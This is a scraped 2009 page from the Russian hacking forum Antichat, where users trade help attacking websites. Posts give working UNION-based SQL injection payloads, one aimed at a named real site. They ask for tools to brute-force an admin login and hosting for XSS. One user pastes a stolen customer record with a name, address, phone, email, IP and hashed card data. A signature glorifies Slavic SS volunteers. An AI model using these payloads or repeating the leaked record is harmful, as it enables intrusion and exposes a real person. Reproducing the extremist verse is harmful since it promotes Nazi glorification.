ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #10281  
Старый 18.11.2009, 21:04
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

Цитата:
Сообщение от fng  
вообще там бред какой-то
поля получается перебирать все из information_schema, а просто по таблицам нет O_o

т.е. я делал выборку из таблицы columns, но лимит срабатывал только когда в выборке участвовало поле column_name

есть у кого предположения почему там так?
Я не понял что у тебя срабатывает, что не срабатывает. Самая заурядная скуля

-36))+union+select+1,2,3,4,unhex(hex(group_concat(t able_name))),6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3 ,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,1+from+info rmation_schema.columns+where+column_name+like+0x25 757365726e616d6525--+
-36))+union+select+1,2,3,4,5,unhex(hex(group_concat (column_name))),7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2, 3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,1+from+inf ormation_schema.columns+where+table_name=0x6578707 45f75736572--+
-36))+union+select+1,2,3,4,unhex(hex(username)),6,7 ,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10, 1,2,3,4,5,6,7,8,9,10,1,1+from+expt_user+limit+0,1--+
 
Ответить с цитированием

  #10282  
Старый 19.11.2009, 07:35
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476

Репутация: 66
По умолчанию

нашел директорию админки, кто нит знает онлайн утилиты для брута пасса http html form?
 
Ответить с цитированием

  #10283  
Старый 19.11.2009, 07:46
DeluxeS
Участник форума
Регистрация: 01.08.2009
Сообщений: 183
Провел на форуме:
1483264

Репутация: 131
По умолчанию

Цитата:
Сообщение от YuNi|[c  
нашел директорию админки, кто нит знает онлайн утилиты для брута пасса http html form?
https://forum.antichat.net/thread109600.html
 
Ответить с цитированием

  #10284  
Старый 19.11.2009, 15:05
wolmer
Постоянный
Регистрация: 12.05.2009
Сообщений: 395
Провел на форуме:
4761503

Репутация: 229
По умолчанию

Дайте пожалуйста ответ по этой теме:http://forum.antichat.ru/thread155501.html
 
Ответить с цитированием

  #10285  
Старый 19.11.2009, 16:40
2Fed123
Познающий
Регистрация: 26.02.2009
Сообщений: 65
Провел на форуме:
226426

Репутация: 5
Отправить сообщение для 2Fed123 с помощью ICQ
По умолчанию

Код:
(0000000039, 'jeffery', 'brown', 'pyramid lock', 'pyramidlock@hotmail.com', '26434 lorenz', '', 'madison heights', 'mi', '48071', 'US', '248-837-9605', 'uKrNsZydbo8=', '0.00', '', '2008-10-18', '', 0, 'MasterCard', 0xad0dcd773619ed1d768fbeb219b14c3a0a23595ef189088ac8ba3ce3a5001944, 0x0a23595ef189088ac8ba3ce3a5001944, 0x5ea4b9f8995d33027b5f3e4b154e8d54, 0x0a23595ef189088ac8ba3ce3a5001944, '2009-09-15 19:05:24', '68.43.87.206', 'c-68-43-87-206.hsd1.mi.comcast.net', 'Active', ''),
В чем это зашифровано?
Код:
0x5ea4b9f8995d33027b5f3e4b154e8d54
Пробовал как Hex неполучается
 
Ответить с цитированием

  #10286  
Старый 19.11.2009, 17:09
L I G A
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332

Репутация: 1196


Отправить сообщение для L I G A с помощью ICQ
По умолчанию

Цитата:
В чем это зашифровано?
Код:
0x5ea4b9f8995d33027b5f3e4b154e8d54
Пробовал как Hex неполучается
если я не ошибаюсь 0x+md5(), т.к.:
strlen(5ea4b9f8995d33027b5f3e4b154e8d54)=32;
&
[a-f0-9]
 
Ответить с цитированием

  #10287  
Старый 20.11.2009, 01:23
Axelhack
Новичок
Регистрация: 19.11.2009
Сообщений: 1
Провел на форуме:
6510

Репутация: 0
Question

Всем привет,

2 вопроса

1. Бесплатный хостинг для XSS и
2. сканер XSS багов на сайте.

Прошу помочь. Благодарен Axelhack.
 
Ответить с цитированием

  #10288  
Старый 20.11.2009, 07:44
p.r0phe.t
Познающий
Регистрация: 22.08.2009
Сообщений: 98
Провел на форуме:
224604

Репутация: 19
По умолчанию

Подскажите, сканер выплюнул:

С помощью команды "PUT /../../../../roellibu.txt" существует возможность записывать любые файлы в произвольное место на диске.

В сервисе TFTP на 69 udp порту. Впервые такую фичу фичу вижу,объясните как реализовывать?
ФТП может висеть на удп? если да,то как приконектиться?

Последний раз редактировалось p.r0phe.t; 20.11.2009 в 07:56..
 
Ответить с цитированием

  #10289  
Старый 20.11.2009, 10:21
Nosfer
Новичок
Регистрация: 10.01.2007
Сообщений: 16
Провел на форуме:
109680

Репутация: 2
По умолчанию

кто может подсказать по скуле в
http://www.pngbd.com/photos/showgallery.php?cat=1'
Никак не выходит, толи поля не подпираются, толи фильтр какой-то
 
Ответить с цитированием

  #10290  
Старый 20.11.2009, 10:26
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

тебе там подвох, что в ошибке не показывает запрос ((и это не есть гуд
почему я подумал про скобку )))


http://www.pngbd.com/photos/showgallery.php?cat=1')+UNION+SELECT+1,version(),3 ,4%23
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ